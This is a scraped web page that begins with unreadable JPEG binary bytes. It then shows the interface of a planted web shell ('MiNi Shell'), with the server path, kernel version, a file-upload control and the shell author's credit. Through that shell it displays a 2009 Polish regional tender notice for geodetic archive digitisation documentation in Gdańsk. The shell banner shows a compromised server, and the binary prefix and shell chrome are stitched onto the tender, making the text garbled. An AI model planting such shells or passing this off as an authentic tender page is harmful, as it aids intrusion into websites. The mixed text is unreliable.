JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/51695-N-2009.html

<p class="kh_header"><b>Gdańsk: Opracowanie dokumentacji technicznej dla realizacji projektu Informatyzacja państwowego zasobu geodezyjnego i kartograficznego oraz opracowanie systemu organizacji, zarządzania i udostępniania przez Internet</b><br>
<b>Numer ogłoszenia: 51695 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej dla realizacji projektu Informatyzacja państwowego zasobu geodezyjnego i kartograficznego oraz opracowanie systemu organizacji, zarządzania i udostępniania przez Internet.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest opracowanie dokumentacji technicznej dla realizacji projektu Informatyzacja państwowego zasobu geodezyjnego i kartograficznego oraz opracowanie systemu organizacji, zarządzania i udostępniania przez Internet. Niniejsze zamówienie dotyczy  opracowania koncepcji i specyfikacji standardów dla jednolitego systemu elektronicznej archiwizacji i obiegu dokumentów państwowego  zasobu geodezyjnego i kartograficznego, zgromadzonego w powiatowych i wojewódzkim ośrodkach dokumentacji geodezyjnej i kartograficznej województwa pomorskiego. Powyższy cel zostanie osiągnięty poprzez utworzenie elektronicznych kopii dokumentów i materiałów znajdujących się w zasobie, utworzenie bazy danych ( rezydualnej) dla tak archiwizowanych dokumentów, opracowanie systemu organizacji, zarządzania i udostępniania powstałych dokumentów przez Internet. Opracowane w oparciu o dokumentację techniczną projektu wytyczne ,będą podstawą do opracowania SIWZ przy udzieleniu zamówienia publicznego na dostawę sprzętu oprogramowania i szkoleń oraz wykonanie projektu.
Projekt Informatyzacja państwowego zasobu geodezyjnego i kartograficznego oraz opracowanie systemu organizacji, zarządzania i udostępniania przez Internet jest realizowany w ramach Priorytetu 2.4 ROZWÓJ ZASOBÓW LUDZKICH, wzmacnianie potencjału ludzkiego w samorządowych służbach publicznych Mechanizmu Finansowego EOG i Norweskiego Mechanizmu Finansowego, na podstawie pozytywnej decyzji Komitetu Mechanizmu Finansowego i norweskiego Ministerstwa Spraw Zagranicznych z dnia 6 marca 2009r. w sprawie wniosku o dotację. 
Liderem projektu i wnioskodawcą jest Samorząd Województwa Pomorskiego, który realizować będzie projekt w partnerstwie z The Norwegian Mapping and Cadastre Authority ( NMCA), Głównym Geodetą Kraju, Wojewodą Pomorskim oraz z 16 Starostwami Powiatowymi, z którymi zostały zawarte odpowiednie umowy o współpracy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przeiwduje wniesienia kwoty wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział wykonawcy, którzy:
1) spełniają wymagania określone w art. 22 ust. 1 ustawy, w szczególności :
a)  wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie
zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   usługi/prace  o podobnym charakterze - minimum 9 usług odpowiadającym swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu ; dat wykonania i odbiorców ( służby geodezyjne i kartograficzne)- zgodnie z załącznikiem nr 5 do SIWZ. 
Pod pojęciem usług podobnym charakterze rozumie się prace związane  z informatyzacją państwowego zasobu geodezyjnego i kartograficznego w Ośrodkach Dokumentacji Geodezyjnej i Kartograficznej, wymienione poniżej:
 a.1 minimum jedno zamówienie obejmujące prace eksperckie w zakresie tworzenia koncepcji lub projektów funkcjonowania lub standardu technicznego, wykonywane dla jednostki administracji publicznej w zakresie obsługi danych państwowego zasobu geodezyjnego i kartograficznego, w którym wartość prac eksperckich wynosiła co najmniej 100.000 złotych brutto.
a.2 minimum jedno zamówienie wykonywane dla jednostki administracji publicznej obejmujące skanowanie dokumentacji archiwalnej z państwowego zasobu geodezyjnego i kartograficznego w ilości co najmniej 50.000 stron format A4 lub 5.000 operatów geodezyjnych oraz umieszczenie ich w repozytorium pracującym w środowisku relacyjnej bazy danych.
a.3 minimum jedno zamówienie wykonywane dla jednostki administracji publicznej obejmujące  wdrożenie portalu internetowego do udostępniania skanowanych dokumentów dla wykonawców prac geodezyjnych i umożliwiającego składanie przez Internet zgłoszeń prac geodezyjnych.
a.4 minimum jedno zamówienie wykonywane dla jednostki administracji publicznej obejmujące wdrożenie systemu informatycznego dla minimum 3 jednostek administracji publicznej (3 lokalizacji odrębnych geograficznie) w jednym zamówieniu.
a.5 minimum jedno zamówienie wykonywane dla jednostki administracji publicznej obejmujące wdrożenie podpisu elektronicznego i elektronicznej skrzynki podawczej umożliwiającej wnoszenie podań i generowanie elektronicznego poświadczenia odbioru spełniającego wymogi ustawy o podpisie elektronicznym
a.6 minimum jedno zamówienie wykonywane dla jednostki administracji publicznej obejmujące wdrożenie systemu metadanych, wprowadzenie i publikacje metadanych wg norm ISO 19115, 19139 i Polskiego Profilu Metadanych oraz uruchomienie serwisu katalogowego (ang. CSW)
a.7 minimum jedno zamówienie wykonywane na rzecz administracji publicznej obejmujące uruchomienie systemu w architekturze zorientowanej na usługi (ang. SOA) oraz uruchomienie usług sieciowych udostępniających dane zgodnie ze standardem WMS i WFS.
a.8 minimum jedno zamówienie wykonywane na rzecz administracji publicznej obejmujące wprowadzenie danych do systemu EWID.

a.9 minimum jedno zamówienie wykonywane na rzecz administracji publicznej obejmujące wprowadzenie danych do systemu GeoEdytor
b) Dysponują lub będą dysponować osobami i podmiotami, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, posiadającymi kwalifikacje niezbędne do realizacji zamówienia w tym:
b.1 dysponują minimum jedną osobą z wykształceniem wyższym technicznym, posiadającą certyfikat jednej z metodologii prowadzenia projektów np. PRINCE2, PMI lub podobnej i pełniącą funkcję kierownika projektu w minimum trzech zamówieniach, z których wartość co najmniej jednego przekraczała 200.000 PLN. 
b.2 dysponują minimum jedną osobą z wykształceniem wyższym geodezyjnym, posiadającą uprawnienia geodezyjne z zakresu 1 i 2, pełniącą funkcję kierownika prac geodezyjnych w minimum trzech zamówieniach podlegających zgłoszeniu zgodnie z ustawą Prawo geodezyjne i kartograficzne. 
b.3 dysponują minimum jedną osobą z wykształceniem wyższym informatycznym lub telekomunikacyjnym, posiadającą certyfikat potwierdzający znajomość technologii usług sieciowych i pełniącą funkcję związaną z wdrażaniem takich usług w minimum trzech zamówieniach. 
b.4 dysponują minimum jedną osobą z wykształceniem wyższym informatycznym lub telekomunikacyjnym, posiadającą certyfikat potwierdzający znajomość technologii podpisu elektronicznego i wykonującą prace z zakresu wdrażania podpisu elektronicznego w minimum trzech zamówieniach
b.5 dysponują minimum jedną osobą ze znajomością struktur danych oprogramowania EWID, posiadającą certyfikat ze szkolenia w programie EWID i wykonującą prace w oprogramowaniu EWID dotyczące integracji danych w minimum trzech zamówieniach. 
b.6 dysponują minimum jedną osobą ze znajomością struktur danych oprogramowania GeoEdytor, posiadającą certyfikat ze szkolenia w programie GeoEdytor i wykonującą prace w oprogramowaniu GeoEdytor dotyczące integracji danych w minimum trzech zamówieniach.

2.   Posiadają ubezpieczenie OC w zakresie prowadzonej działalności opiewające na kwotę przynajmniej 500 000 zł. Polisa obowiązywać ma przez cały okres trwania umowy. W przypadku upływu terminu ważności ubezpieczenia w trakcie realizacji umowy, wykonawca przedstawi zamawiającemu, na 14 dni przed wygaśnięciem ubezpieczenia nową polisę, obejmującą okres pozostały do zakończenia trwania umowy.
3.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2.
4. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów i oświadczeń, przedłożonych przez wykonawcę wraz z ofertą i wyszczególnionych w pkt III.2 Informacja o oświadczeniach i dokumentach (...), na zasadzie kwalifikacji spełnia,nie spełnia.
5. W przypadku wykonawców występujących wspólnie warunki określone w ust. 1 pkt. .1 lit. a) wykonawcy spełniają łącznie (dokumenty wskazane w § 5 ust. 1 pkt. 1-3 SIWZ składa każdy z wykonawców występujących wspólnie we własnym imieniu), warunek wskazany w ust. 2 spełnia każdy z wykonawców występujących wspólnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca składa wraz z ofertą następujące dokumenty:
1) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu- wg. wzoru 
    na załączniku nr 2 do SIWZ;
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
     zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 
     miesięcy przed upływem terminu składania ofert;
3) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
     4) wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z dokumentami potwierdzającymi, że te usługi zostały wykonane należycie ( np. referencje ) - załącznik nr 5 do SIWZ.;
     5) wykaz osób uczestniczących w wykonaniu zamówienia zgodnie z załącznikiem nr 6 do SIWZ;
6)  Polisa lub inny dokument potwierdzający  ubezpieczenie OC w zakresie prowadzonej działalności opiewający na kwotę przynajmniej 500 000 zł
7)  Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5, wykonawca wskazał osoby, którymi będzie dysponował;
2. Dokumenty sporządzone w języku obcym będą składane wraz z tłumaczeniem na język   polski, poświadczonym przez wykonawcę.
3. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu będą składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
4. Dokumenty składane przez wykonawców zagranicznych.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1) zamiast dokumentów, o których mowa w § 5 ust. 1 pkt. 2 i 3 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
5. Dokument, o którym mowa w ust. 4 pkt 1 lit. a, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 4 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust. 5..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 30</li>
<li>2 - Meritum - 70</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotapomorza.pl/pl/bip/umwp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego, ul. Okopowa 21/27, 80-810 Gdańsk, pok. nr 8A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2009 godzina 09:30, miejsce: Urząd Marszałkowski Województwa Pomorskiego, ul. Okopowa 21/27, 80-810 Gdańsk, Kancelaria Ogólna, pok. nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com